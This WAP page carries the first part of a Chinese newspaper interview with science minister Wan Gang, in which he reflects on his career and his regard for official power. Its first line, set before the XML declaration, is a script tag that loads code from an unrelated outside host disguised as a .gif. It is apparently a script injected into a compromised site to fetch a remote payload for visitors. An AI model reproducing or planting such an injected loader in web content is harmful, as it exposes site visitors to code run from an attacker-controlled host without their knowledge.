<script src=http://tw.lovechina.tw.cn/count/js/gif.gif></script>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
<head><meta forua="true" http-equiv="Cache-Control" content="max-age=0" /></head>
<card title="万钢：对自己的权力有一种敬畏" id="card1">
<p> 游客</p><p>
标题:万钢：对自己的权力有一种敬畏<br/>
正文:<br/>
万钢：对自己的权力有一种敬畏来源：新快报 作者：肖萍 余亚莲 张英姿 陈琦钿 廖颖谊 陈红艳   &amp;ldquo;您是愿意做(科技部)部长还是愿意做(政协)副主席？&amp;rdquo;3月8日，列席十一届全国人大一次会议的科技部部长万钢在会议开幕前被一众媒体&amp;ldquo;堵&amp;rdquo;住了，有记者在人群中向部长高喊了这句话。    众记者都笑了，万钢也笑了：&amp;ldquo;都愿意做。但我更愿意做一名科学家。&amp;rdquo;    在记者眼中，这位部长是个谦逊温和的人。由于隔着护栏，不少高官对护栏外记者的喊话都只是一笑而过，万钢是少有的能走到近前来回答记者问题的其中一位高官。    昨天上午，就在全国政协十一届一次会议第四次全体会议召开前6小时，还是政协常委、科技部部长的万钢率领科技部下属人员接受了中外记者的集体采访。    集体采访一开始，万钢就谦逊地感谢媒体：&amp;ldquo;大家对科技的热情十分高涨，我们没有很大的成绩，你们都给很大的鼓励；我们有一些看不到的缺点，你们给予了批评指正。在此我代表科技部，也代表科技界广大的同仁对大家的关心表示衷心的感谢。&amp;rdquo;    在谈到做科技部部长一年来的感受时，一直温文尔雅的万钢略略有些感慨。    56岁的他细数了自己数十年来的经历&amp;mdash;&amp;mdash;他做过农民：上世纪七十年代，在吉林省延吉县三道公社插队整整六年；读过大学，在东北林业大学道桥系本科学习；做过老师，在东北林业大学、同济大学教书；留过洋，不但在德国克劳斯塔尔工业大学机械系读了博士，还在德国奥迪汽车公司做到技术经理；回国三年后，他做了母校同济大学校长。去年4月被任命为科技部部长。    回忆起这些，万钢说：&amp;ldquo;我这个人当过农民，也进过工厂，也当过科学家，也在企业里面工作过，也做过管理工作，但是我的经验不足，所以我一上任就跟大家说，我是诚惶诚恐，忐忑不安。&amp;rdquo;    他这样解释他的&amp;ldquo;忐忑&amp;rdquo;：一个是经验不足，一个是对岗位的敬畏。   &amp;ldquo;<br/><a href="http://www.51ding.cn/screw/wap.asp?mode=WAP&amp;act=View&amp;id=382&amp;Page=1">[&lt;&lt;]</a><a href="http://www.51ding.cn/screw/wap.asp?mode=WAP&amp;act=View&amp;id=382&amp;Page=1">[[1]]</a><a href="http://www.51ding.cn/screw/wap.asp?mode=WAP&amp;act=View&amp;id=382&amp;Page=2">[2]</a><a href="http://www.51ding.cn/screw/wap.asp?mode=WAP&amp;act=View&amp;id=382&amp;Page=2">[&gt;&gt;]</a><br/>
<br/>
<a href="wap.asp?act=Com&amp;id=382">查看评论(0)</a><br/>
<a href="wap.asp?act=AddCom&amp;inpId=382">发表评论</a><br/><br/>

<br/>

<br/>
<a href="http://www.51ding.cn/screw/wap.asp">首页</a>
</p>
</card>
</wml>